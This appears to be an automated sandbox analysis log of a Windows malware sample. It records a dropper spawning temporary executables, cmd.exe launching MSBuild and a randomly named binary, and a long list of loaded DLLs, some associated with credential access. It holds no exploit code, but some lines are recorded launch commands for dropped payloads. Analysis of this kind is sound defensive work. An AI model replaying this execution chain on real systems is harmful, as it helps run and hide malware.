                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeProcess created: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe "C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe"
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeProcess created: C:\Users\user\AppData\Local\Temp\u5ek.3.exe "C:\Users\user\AppData\Local\Temp\u5ek.3.exe"
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 1564
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeProcess created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 2220
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe "C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe "C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe"
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeProcess created: C:\Users\user\AppData\Local\Temp\u5ek.0.exe "C:\Users\user\AppData\Local\Temp\u5ek.0.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeProcess created: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe "C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeProcess created: C:\Users\user\AppData\Local\Temp\u5ek.3.exe "C:\Users\user\AppData\Local\Temp\u5ek.3.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeProcess created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe "C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe"
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: msvcr100.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: zipfldr.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: shdocvw.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: winshfhc.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: wdscore.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: winshfhc.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: wdscore.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: msvcr100.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: mozglue.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: msvcp140.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: oledlg.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: oleacc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: riched20.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: usp10.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: msls31.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: pla.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: pdh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: tdh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: cabinet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: wevtapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: shdocvw.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: security.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: olepro32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: schedcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: logoncli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: msxml6.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: idndl.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: bitsproxy.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
